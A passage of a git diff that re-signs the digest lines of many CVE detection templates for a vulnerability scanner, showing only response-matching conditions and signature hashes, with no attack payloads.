contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 490a00463044022030bf54a98de12d6a8cbe3a62a7867a738139405cafddbeada35786671990f41302207b218e6af53247a81c33446d5f51a7e4fba79b922726da92806dc2b13ddeef23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a901bac354c110286d6a4a980f672dc766474820224b0b46b62881f5ce980824022044c0d5ff437010c9cf830f6794a5f6d2f32695aa0f0570287974270e60968b44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 54f2ec6c2b..82ecf3cb5d 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022100a9e0a231234787b15b648a6dfecaeec34f61f735603c1645561714de11ce66e6022007b345d1312a924c1bb7cdf413ffd7a61febb92459a3facc5a9789caa6e967d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0fd62bbc51499f979a63a776bc67e20dab81bfd3637d128e1e3942b6a704883022100dff1afb0dfaf7ac77ba469bc10d00be2158dfc2f19db93993c04be0b7105c7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34754.yaml b/http/cves/2023/CVE-2023-34754.yaml index b7788d7f3c..1eb3218104 100644 --- a/http/cves/2023/CVE-2023-34754.yaml +++ b/http/cves/2023/CVE-2023-34754.yaml @@ -51,4 +51,4 @@ http: - 'contains_all(body_2, "Active", "Inactive")' - 'status_code_2 == 200' condition: and -# digest: 490a0046304402204e53d6c595dc28b25c838426f2f14529673a84b25765cb53fcc6af4c7438747202203b3aa9f7537c8dc2082627251a80a6f38c6d8169c1fabf595f7d0f39a4d36d74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d14113ff18f008d887efe9fcc015e736070a434495df62a7e10f3a2b3c94c44e022046372cb5cd91ff1f852d4fde9397595e90ba5e18bf23806348cda8635bb5a3a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 001aa39287..9d3d897348 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022032f9ef103860ed8443efeacbaf4866b3fd14fd37d2516e607080b5c04ec0bb6d022100a0faf26e8239032272fddd3087a50d7c435351f7f708238c8a7161b260ceab53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009315cc1f158d1ec70ade7e354d4a75e2b9aa161e5031f81a18ad26a6435f804d02204406e4d3bdf89ccedde4466b63a0aeef1318b31bc8a170de98d5ec46160e43a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 067c20a8ee..68f768a40d 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -53,4 +53,4 @@ http: - contains(header, "text/html") - contains(body_2, 'Admincenter') condition: and -# digest: 4a0a00473045022100b1803d30aa04646f293cfa1056675d9ff48d6c5b3292d05e0248b3bda92d5158022012461a8f49d686040da02bcf1fb55825bb9ae2bc3b76d8fa3e6747e2f229edd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041a14075ae6ea455af30183a7cf6914cedc8c6a78e05637080462df99e5967d702205d6bd7732a8e59fafdcb35ab4b3f4a0faa1c66828d8609ce556d4a8ff41609fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 96116ee64f..c2abcab60c 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -58,4 +58,4 @@ http: - duration>=5 - 'contains(body, "Guest Information")' condition: and -# digest: 4b0a00483046022100be761ba1c4d35d37f2477043c838509e758b5823b11e9519c50e36a8e9ca07bf022100b0e938bfb91cfacfd6a64d4c5a6004b91a17cb3b28e226db6648e2fe19a9433d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b415740809149e0d81168e39c0eae3104ea9d704bfab090fd1270cace85aa2bf022045e0113ca357f4b47840b375f0ac22bec60be0be25e5c01cfdfeaf54a7c36d6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 8aab71fa9c..c0b053d8d2 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -55,4 +55,4 @@ http: - 'status_code == 200' - 'contains_all(body, "Tree Mode", "cacti")' condition: and -# digest: 490a00463044022002af61baaf992b1167e9f2985b01c088d748134231a69f9fd3a5381851a758c402202527d2063c1039eefc8947a87236bf4cb6fcb0cccf8d8e5d6d1fe9346f0ef463:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023bb0ebfca1b2820e2f91338dec137457a77427624424a4a7eb045dacf2bbd2e02201008f8dbb5e01ea7a4db4e180ea9da60a2de1c6f88e7cb4008c6483e47b975a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 468ce07fc7..c436a1b4a3 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -60,4 +60,4 @@ http: - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")' - 'status_code_2 == 200 && status_code_3 == 302' condition: and -# digest: 4b0a00483046022100d836d1ae691f5a69f7bb0f843015b327c7bf075bcc534b89dba1e6bd2266109d022100d2eeba3d7626001ddc46d70cdcbce9f19d5f91678fcabcaa3b4fab576317760b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063ab8cd88d8384d4f502b4ba209d000d2ee3549a1adcab1134e047e60ed3829a02210083f720ec636d42d04b19efc90b71713edd4a4e887c85e8c52076e3d91bf7608f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index f3f50a6186..eb2a53d2c1 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -43,4 +43,4 @@ http: - 'status_code_1 == 200' - 'contains(body, "Record deleted successfully!")' condition: and -# digest: 4a0a00473045022100ce40215e4d2fba5acf81c684dc93363c17955c178d0dc4777c89c2472b627950022001713b9c40f260396785c78a21cc5a79ea88f38878a20155889a29ca0db1f63f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de7e8110156273afe05269842f7eafdcdb9cf9f3706a125f80238a4300011b4f02205a3960c901deeb854412d3697f67812680b1475ec1fb58a3584b3d46bd3754e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index aa8fc1c581..8ec29b18c7 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -68,4 +68,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and -# digest: 4a0a00473045022100ed2d51a5b859e168d3fc27ac78f51230ab105242084cf9831ea4b902476c839102206db1002120c87c478ebee22051057ab49b28ac5e09ce3df92c36d34fff1e7e6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041a00efa5fbde872ef26c58ff68c9248334294ad3678c776662403322245bb50022100c40b2c1800c1c54794ab3f6a1cce7f1234a54c03890de4c031a4450d2ffe9538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 9d55188a7d..99ef8c362f 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -58,4 +58,4 @@ http: - status_code == 302 - contains(content_type, "text/html") condition: and -# digest: 4a0a004730450220645cf42d390fd2f7e6fc37c997c7f9c6ab7a133204cfcdf3f810e9b3057df10a022100a860757d5de921d63a30dbd34e422428e685a3f8c210882430d572a07af8d8bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100947a588d8b79698aeb2b23c7c95ccca4640d406f2501a039d472f13f6d082e7f022039c8e9540b239b7ecb2063f182a3e60403d4eabc84f84e038150507b99777b68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index a414583b38..df79a24392 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -45,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(header, "PrestaShop")' condition: and -# digest: 4b0a0048304602210084f3dd4c14e462af1fda111673ef3262c1f81011df72f6549d8eae52486c80790221009d3365465d5755202b95c41fa0816386929ea33b70f7cedba36da8bdeeffcc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5a7016d1ee75ace061990e70fa579a51ec5a2f85fca7837036510855affb4ed022072869778eb02a316a25d7e2100e5a605f1d7a36968887563d771db4c6a8f3532:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 40b2d4ac48..1686b38533 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -74,4 +74,4 @@ http: regex: - 'name="nsp" value="(.*)">' internal: true -# digest: 4a0a004730450220623f7fb2b34ade32923274720fe9a2b327b9ac34899c696d8ecccdc433721f6e022100e5f82eb99ea3cbe02399c7de0f20d00eb874b79262bc835e67c77a461141c2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f64062035ab4b1cbef4347c58b883d9529e54d5a6babcd458ee8f8a43a2be840221009564e2af1055e2fc9d67fedeccd6d66e0fe1db78f8c7186456e0d8d9bb96d82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index cdd8e1af55..0b0a98fa2b 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -45,4 +45,4 @@ http: - status_code == 500 - contains(body, "Courses") condition: and -# digest: 4a0a0047304502201dcf423b4b6924981e6abf474979ba0989f52fc8514307b6c99025e5f0d845c3022100fae8105c7521925c94ec0ccbdf1ff865446dffecffab99eaf917da8fba3c104f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100848b1a92ba841826223eef9419b0057677776747e2c33fb15b72bf358b9d9e47022046cec0222ca76572a684729e9155881a36f9a9db8fce316a333650510e24b4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 209ca6b00d..eb84845be2 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -63,4 +63,4 @@ http: - 'status_code == 200' - 'contains(body, "/wp-")' condition: and -# digest: 490a00463044022051ec19e02a4b1673420c6f8ae5dd62bb89f55d6b1e86707c230a2994f71c869f022052a679d6f879ebf090ce0f4663c92d5b9c425870a9b3c6a67283307bb5a1cb10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2bfa5cd824fee4dbea8cca2ca1aa8d9bb49802e1faef4286ab762d8f62beb9b022100c2d938d059db7579f9a1b9a9e4a8dec0a4dd63a12a607d155fe681d26fff76b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index cae140f0a7..a55389b28f 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -46,4 +46,4 @@ http: - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and -# digest: 490a0046304402205e93a6bb45c0bbe33f02031a844f058505d49404e5fd5f822c7d38561d3cd5ad022016b9afb03f037ed05d1ab8589472724427c817f32168f420c16c69c7955bb92b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce5d6a11669f4b0dd3819ac1bf30438d88d9bbfbe8b62271bbe4c1570bc3e308022023bb797d8bf7499a7a05b5594a95739d5dfb01219afff2622169013f1388f161:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 43aeda4f81..695f2d9277 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -47,4 +47,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and -# digest: 4b0a00483046022100bc9330743b2ba8e6430fd774e3edf739f4ce8503012c09069b49bcd1f0a4105f022100e3ea7db336d5b628198a71833e400f2c141a061fc25ff9120a4583b33c23988f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220044ef882d07aef0ed44f3e31de398b83bb2f92a3a29a6717cb3da60e12b6a5ae02203a314e3c2e8edecf04982c8f22a17ea787c2c732334f20341b793e0f9896b2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index d72035437a..0c5c30da23 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -64,4 +64,4 @@ http: regex: - '"nonce":"([0-9a-z]+)"' internal: true -# digest: 4b0a00483046022100a98eb6e259caa69debdb69700c7b0e9f39f6379a965172bdb27476698c655dbb02210090de1012685637403007c1d87cbe936d1a2288aa76bf5a02f12808f9bacd280a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059c60c551c038240a0bb8375d718cb9af640e473ff554b5c806f3b019dda07e702210080ac6b00b027a07487bddbc14dc84c2c43d80a8748db482aae200cfa8e98a3e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index 15a9c7b4e9..216f217e5e 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100c6dbdabebf3324ee1e4f9d45c2950a0ce5014cdfc534dea737e3a9ff0b443dbd022100a8d3ef776d11c757f11fa7ac51275fada26d7035c89eb55fe944b9a7f653843a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c99b119aeb36496a99a7ac2c6e86a75a32a1b5c9016149c712dce1c21b7ad4902205d124d095c91ba44d46274d288411d6b049f0dfa07046a435303934062e41382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1698.yaml b/http/cves/2024/CVE-2024-1698.yaml index 283322f02d..6e24570a01 100644 --- a/http/cves/2024/CVE-2024-1698.yaml +++ b/http/cves/2024/CVE-2024-1698.yaml @@ -45,4 +45,4 @@ http: - 'contains(body, "{\"success\":true}")' - 'contains(header, "application/json")' condition: and -# digest: 4a0a00473045022100dc0c2cee22d2614e1a3a15a7318e0f20fd4d87a1169cbc7196d2e41346a50a8c022027708781fc9ab4554ea6cb10af29ed73bf80a5394900b0d0dd7f20638496ca61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003028c6a32b783ad93f22679e92ab68a147457e132b85098d896aa6025595305022100dea5f161e6b8b31af7d19d473660d524ea52b8ea274b20882588a558439ebc82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml index cee935f338..b78a0c5fb9 100644 --- a/http/cves/2024/CVE-2024-2621.yaml +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -40,4 +40,4 @@ http: - 'status_code == 200' - 'contains_all(body,"msg\":","header\":","code\":")' condition: and -# digest: 4a0a00473045022100a52b0c5b76efaf890e2a47563d494a96fce85d7358a34a0b2ed4027e0dc1c2d202206721b9c12ec93f014b0111b14d53ef8e69c79a19ec1eb23f367c7823881fcd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e8c0fee14c73fc3af5f46c2d7454d8d8d787b7b8454c06d564964567ab11cbd0022035381a21ec226fdfd1a1ec81b41f858eb4b256b5689df2468e6c9c3bbca123f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 58bc409142..f0ab0930a0 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/csv")' - 'contains_all(body, "DATE", "ACTION", "KEYWORD")' condition: and -# digest: 490a00463044022059d16ddd969cd0cc9c7c05d5ca2d66a1a4e5631bacd4815549a048eee5cf121702206ea54044b56d493bf48811a0def2447e3780f5783796e6a33becfcb9a2bd9d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e767d9720e3594f5609c8c78cd9d82019ea4b41899cbc1144d65d4d6b703c84202203246df1970986e7c1fe1fd8c14a7b5ab0c9ad50381aa2dd80e85b573a87db848:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2876.yaml b/http/cves/2024/CVE-2024-2876.yaml index 6153ca2d40..9ee59ec494 100644 --- a/http/cves/2024/CVE-2024-2876.yaml +++ b/http/cves/2024/CVE-2024-2876.yaml @@ -33,4 +33,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "bulk_action", "_sent", "errortype")' condition: and -# digest: 4a0a00473045022100817fb9b3e4ea49e7dbe5e57d8b5e04f4325b5d104def6e85aed38a448372bbe002207bd138ea4becb7377be2c0d77ca9bf30101280e1e917339800ad3cc99954c2d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d0de14df8a7c6602ecf37381e666c0f2f69d971e54bf18ef23b2589119ffe43002202ab9f2c9fd02b2fbf5b0c23bd211aa27a7c8e2f52aece1306247b2dcc9aa9e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 31f48e7417..083ab6be50 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -55,4 +55,4 @@ http: - status_code == 200 - contains(body, "